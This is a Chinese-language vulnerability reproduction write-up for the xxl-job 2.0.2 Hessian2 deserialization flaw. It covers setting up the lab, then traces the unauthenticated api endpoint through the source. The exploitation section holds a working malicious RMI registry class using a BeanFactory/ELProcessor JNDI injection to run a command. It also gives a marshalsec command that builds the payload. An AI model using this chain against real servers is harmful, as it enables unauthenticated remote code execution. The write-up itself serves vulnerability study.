xxl-job <=2.0.2 反序列化漏洞
搭建
https://github.com/xuxueli/xxl-job/releases/tag/2.0.2 下载源码,导入idea,mysql导入sql文件,修改数据库配置后运行XxlJobAdminApplication 即可成功启动项目。
漏洞分析
xxl-job-2.0.2xxl-job-adminsrcmainjavacomxxljobadmincontrollerJobApiController.java 中api接口设置了 @PermessionLimit(limit=false) 没有无需登录即可访问
@RequestMapping(AdminBiz.MAPPING)
@PermessionLimit(limit=false)
public void api(HttpServletRequest request, HttpServletResponse response) throws IOException, ServletException {
XxlJobDynamicScheduler.invokeAdminService(request, response);
}
跟进 invokeAdminService方法
public static void invokeAdminService(HttpServletRequest request, HttpServletResponse response) throws IOException, ServletException {
servletServerHandler.handle(null, request, response);
}
跟进 handle
parseRequest 会对请求进行处理
private XxlRpcRequest parseRequest(HttpServletRequest request) throws Exception {
// deserialize request
byte[] requestBytes = readBytes(request);
if (requestBytes == null || requestBytes.length==0) {
throw new XxlRpcException("xxl-rpc request data is empty.");
}
XxlRpcRequest rpcXxlRpcRequest = (XxlRpcRequest) xxlRpcProviderFactory.getSerializer().deserialize(requestBytes, XxlRpcRequest.class);
return rpcXxlRpcRequest;
}
这里可以看到有一个反序列化操作 ,跟进deserialize 看看
deserialize 是一个抽象方法
xxl-job-2.0.2xxl-job-adminsrcmainjavacomxxljobadmincorescheduleXxlJobDynamicScheduler.java 中
可以得出,上面的反序列化会进入到HessianSerializer类中为hessian2反序列化。
漏洞利用
javax.el.ELProcessor
本地开rmi服务
package RMI;
import com.sun.jndi.rmi.registry.*;
import javax.naming.*;
import org.apache.naming.ResourceRef;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
import javax.el.ELProcessor;
import org.apache.naming.factory.BeanFactory;
public class RmiTest {
public static void main(String[] args) throws Exception {
System.out.println("Creating evil RMI registry on port 1099");
Registry registry = LocateRegistry.createRegistry(1099);
//prepare payload that exploits unsafe reflection in org.apache.naming.factory.BeanFactory
ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "", true,"org.apache.naming.factory.BeanFactory",null);
//redefine a setter name for the 'x' property from 'setX' to 'eval', see BeanFactory.getObjectInstance code
ref.add(new StringRefAddr("forceString", "x=eval"));
//expression language to execute 'nslookup jndi.s.artsploit.com', modify /bin/sh to cmd.exe if you target windows
ref.add(new StringRefAddr("x", """.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("JavaScript").eval("new java.lang.ProcessBuilder['(java.lang.String[])'](['cmd','/c','mstsc.exe']).start()")"));
ReferenceWrapper referenceWrapper = new com.sun.jndi.rmi.registry.ReferenceWrapper(ref);
registry.bind("Object", referenceWrapper);
}
}
生成poc
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Hessian2 SpringAbstractBeanFactoryPointcutAdvisor rmi://127.0.0.1:1099/Object >hessian2.dat
- 注意在burp提交序列化数据需要设置
User-Options ->Display -> Character-sets -> Display as raw bytes并重开burp
参考
https://kingx.me/Restrictions-and-Bypass-of-JNDI-Manipulations-RCE.html